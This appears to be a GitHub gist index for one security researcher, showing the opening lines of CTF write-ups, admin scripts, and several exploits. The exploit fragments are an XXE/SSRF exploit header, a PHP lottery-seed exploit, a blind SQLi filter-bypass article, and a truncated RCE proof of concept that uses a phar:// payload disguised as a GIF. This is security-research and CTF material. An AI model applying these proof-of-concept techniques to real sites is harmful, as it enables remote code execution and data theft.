🆎**********************************
Be Lazy~

Harold Kim stypr

@stypr
stypr / README.md
Last active June 22, 2019 15:47
ASIS CTF 2016 Finals: pentest (298pt)

pentest (298pt)

Solves: 1

This write-up was made at the request of other players who were playing ASIS CTF.

Note: I solved this challenge before the hint was released. \o/

Description

@stypr
stypr / rdp.ps1
Last active August 17, 2019 19:58
How to convert HTTPS Certificates for RDP auth (using Caddy)
# derived from http://stackoverflow.com/questions/40046916/how-to-grant-permission-to-user-on-certificate-private-key-using-powershell
param (
[string]$certThumbprint = "NothingToDoHere"
)
$serviceAccount = 'NETWORK SERVICE'
$permissionType = 'Read'
try
{
Write-Host "Thumbprint: $certThumbprint"
#Clear Existing Variables
@stypr
stypr / patch.py
Last active August 3, 2019 16:59
Migrating old php files to newer versions
#!/usr/bin/python -u
#-*-coding: utf-8-*-
def list_directory(expression):
    try:
        _c = __import__("glob").glob(expression + "/*")
        for i in xrange(len(_c)):
            if "uploads" not in _c[i] and "userimage" not in _c[i] and "files" not in _c[i]:
                _c.extend(list_directory(_c[i]))
        return _c
    except:
@stypr
stypr / README.md
Last active January 26, 2020 20:37
SecuInside 2017: Mathboy7 (415pt)

Mathboy7 (415pt)

A random string can be generated with the ENCRYPT() function.

encryption-functions from mysql.com

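  1. With ENCRYPT(x) alone, the challenge is probabilistically unsolvable, but if a salt value is set, the first few characters come out the same, so the probability is greatly reduced.

  2. The output of ENCRYPT(x,y) consists of A-Za-z0-9./, which makes it probabilistically difficult, but strtolower($var) in the challenge reduces the probability a second time.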

@stypr
stypr / iptables-irccloud.sh
Created October 29, 2017 14:42
iptables configuration for connections between irssiproxy and irccloud
iptables -N irccloud
iptables -A irccloud --src 192.184.9.108 -j ACCEPT
iptables -A irccloud --src 192.184.9.110 -j ACCEPT
iptables -A irccloud --src 192.184.9.112 -j ACCEPT
iptables -A irccloud --src 192.184.10.118 -j ACCEPT
iptables -A irccloud --src 192.184.10.9 -j ACCEPT
iptables -A irccloud --src 170.178.187.131 -j ACCEPT
iptables -A irccloud --src 192.184.8.73 -j ACCEPT
iptables -A irccloud --src 192.184.8.103 -j ACCEPT
iptables -A irccloud -j DROP
@stypr
stypr / exploit.py
Created November 3, 2017 09:58
familiar (485pt) XXE + SSRF
#!/usr/bin/python -u
#-*- encoding: utf-8 -*-
import os
import sys
import requests
import json
from base64 import *
HOST = "core.eagle-jump.org"
@stypr
stypr / 9en3rat0r.php
Last active August 3, 2019 16:54
Lotto Exploit
<?php
function generator()
{
$PATH = "./s3cre7_fi1e";
$init_seed = 0;
if(!file_exists(realpath($PATH)))
{
$init_seed = $seed = intval(uniqid(),10);
$f = fopen($PATH,"w");
fwrite($f,$init_seed);
@stypr
stypr / README.md
Last active August 25, 2020 15:06
Blind SQLi 2018: Utilizing SQL standard to create payloads

There are several ways to bypass blind SQLi filters, and today I will introduce a MySQL blind SQLi payload that uses the insert() function.

Interestingly, the payload itself is limited to MySQL, but the technical side of this attack should still be valid in most SQL.

This attack is useful when typical substring filters (i.e. left(), right(), mid(), substr(), regexp(), strcmp(), concat() ... LIKE ...) are blocked by the script.

TL;DR

@stypr
stypr / iptime_wol.py
Created February 13, 2018 07:12
iptime WOL in python
#!/usr/bin/python -u
#-*- coding: utf-8 -*-
# Developer: Harold Kim(root@stypr.com)
import os
import sys
import re
import requests
class iptime:
@stypr
stypr / attack_script.js
Last active August 3, 2019 16:47
KVE-2018-0441, KVE-2018-0449 RCE PoC (Windows Only)
// Payload of the uploaded file.
// var payload = `phar://../data\\file/free/1062687231_CmB8gHok_143f7b739dcab1b6837abdfa39b0109467c35d51.gif/GIF89a.php`;
var payload = `[PAYLOAD_URL]`
// Before attacking, first check whether this is an administrator who supports this feature.
$.get(`../qa_config.php`, function(d){
// The field to modify is the one containing "file path", so check only that part first.
if(d.indexOf(`상단 파일 경로`) !== false){